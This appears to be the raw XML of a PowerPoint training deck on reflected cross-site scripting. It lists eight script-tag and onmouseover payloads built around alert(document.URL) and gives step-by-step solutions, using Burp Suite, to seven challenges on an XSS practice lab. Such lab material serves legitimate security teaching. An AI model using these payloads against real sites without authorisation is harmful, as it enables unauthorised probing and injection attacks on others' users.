              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" u="sng" dirty="0"/>
              <a:t>Parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> name and submit</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" u="sng" dirty="0"/>
              <a:t>Payloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>–  </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>&lt;script&gt;alert(document.URL)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>&gt;&lt;script&gt;alert(document.URL)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>“&gt;&lt;script&gt;alert(document.URL)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>‘&gt;&lt;script&gt;alert(document.URL)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>“;&lt;/script&gt;&lt;script&gt;alert(document.URL)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>‘;&lt;/script&gt;&lt;script&gt;alert(document.URL)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>=’alert(document.URL);</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>=”alert(document.URL)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{36E9AA83-32DB-4476-94BB-3B242D35D09A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4857519" y="187817"/>
            <a:ext cx="2476960" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0"/>
              <a:t>Exploit</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551329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D817356-8EE5-4C81-8D21-97FF34A6F55F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532660" y="257453"/>
            <a:ext cx="11283518" cy="6471822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="sng" dirty="0"/>
              <a:t>How to reproduce this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Vulnerability-</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Visit the URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://leettime.net/xsslab1/chalg1.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type any word in the name field provided “Enter Your Name here “and intercept the request with Burp suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open burp suite and intercept the request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Go to Proxy tab in Burp suite and change the “name” parameter with the payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>&lt;script&gt;alert(document.URL)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forward the request and the alert will trigger.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Challenge 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enter payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;script&gt;alert(document.URL)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in the search box and press enter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open burp suite and intercept the request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Go to Proxy tab in Burp suite and change the “name” parameter with the payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>&lt;script&gt;alert(document.URL)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The alert will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>trigger.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>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7325826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2593C26-34B2-481B-9EA9-100CA5BBC1BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="543387" y="233038"/>
            <a:ext cx="11105225" cy="6019481"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>Challenge 3</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Enter payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>“&gt;&lt;script&gt;alert(document.URL)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> in the search box and press enter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The alert will trigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Enter payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>‘&gt;&lt;script&gt;alert(document.URL)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> in the search box and press enter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The alert will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>trigger.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>Challenge 5</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Enter payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>";&lt;/script&gt;&lt;script&gt;alert(document.URL)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> in the search box and press enter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The alert will trigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>Challenge 6</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Enter payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>‘;&lt;/script&gt;&lt;script&gt;alert(document.URL)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> in the search box and press enter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The alert will trigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>Challenge 7</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Enter payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1"/>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>=’alert(document.URL);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> in the search box and press enter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Hover the mouse on search box and the alert will trigger.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31952702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docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template/>
  <TotalTime>784</TotalTime>
  <Words>1309</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>181</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Gill Sans MT</vt:lpstr>
      <vt:lpstr>Times New Roman</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 jain</dc:creator>
  <cp:lastModifiedBy>Khu shi</cp:lastModifiedBy>
  <cp:revision>45</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-06-16T08:36:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-06-28T19:55:52Z</dcterms:modified>
</cp:coreProperties>
</file>